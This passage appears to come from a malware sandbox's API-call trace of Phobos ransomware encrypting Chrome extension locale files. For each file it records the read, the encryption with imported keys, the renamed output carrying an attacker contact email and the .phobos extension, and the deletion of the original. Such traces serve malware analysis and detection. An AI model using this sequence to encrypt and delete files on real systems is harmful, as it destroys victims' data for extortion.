data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.249] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.249] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.249] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.249] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.249] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd9, lpOverlapped=0x0) returned 1 [0149.291] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.291] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.292] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0149.292] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.292] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.292] CryptDestroyKey (hKey=0xa32de8) returned 1 [0149.292] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.292] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.292] CloseHandle (hObject=0x188) returned 1 [0149.293] CloseHandle (hObject=0x134) returned 1 [0149.293] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json")) returned 1 [0149.294] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.294] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=215) returned 1 [0149.294] CloseHandle (hObject=0x134) returned 1 [0149.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json")) returned 0x2020 [0149.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.294] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.294] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.295] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.295] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.295] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd7, lpOverlapped=0x0) returned 1 [0149.297] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.297] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0149.297] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.297] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.297] CryptDestroyKey (hKey=0xa32de8) returned 1 [0149.297] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.298] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.298] CloseHandle (hObject=0x134) returned 1 [0149.298] CloseHandle (hObject=0x188) returned 1 [0149.298] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json")) returned 1 [0149.299] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.301] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=221) returned 1 [0149.301] CloseHandle (hObject=0x188) returned 1 [0149.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json")) returned 0x2020 [0149.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.301] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.301] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.302] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.302] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdd, lpOverlapped=0x0) returned 1 [0149.302] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.302] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0149.303] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.303] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.303] CryptDestroyKey (hKey=0xa32de8) returned 1 [0149.303] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.303] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.304] CloseHandle (hObject=0x188) returned 1 [0149.304] CloseHandle (hObject=0x134) returned 1 [0149.304] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json")) returned 1 [0149.305] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.306] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=279) returned 1 [0149.306] CloseHandle (hObject=0x134) returned 1 [0149.306] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json")) returned 0x2020 [0149.306] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.306] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.306] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.307] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.307] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.307] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x117, lpOverlapped=0x0) returned 1 [0149.308] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0149.308] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0149.308] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0149.308] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.309] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.309] CryptDestroyKey (hKey=0xa32de8) returned 1 [0149.309] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.309] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.309] CloseHandle (hObject=0x134) returned 1 [0149.309] CloseHandle (hObject=0x188) returned 1 [0149.309] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json")) returned 1 [0149.310] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.310] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=235) returned 1 [0149.310] CloseHandle (hObject=0x188) returned 1 [0149.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json")) returned 0x2020 [0149.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.311] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.311] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.311] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.311] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.311] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xeb, lpOverlapped=0x0) returned 1 [0149.312] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 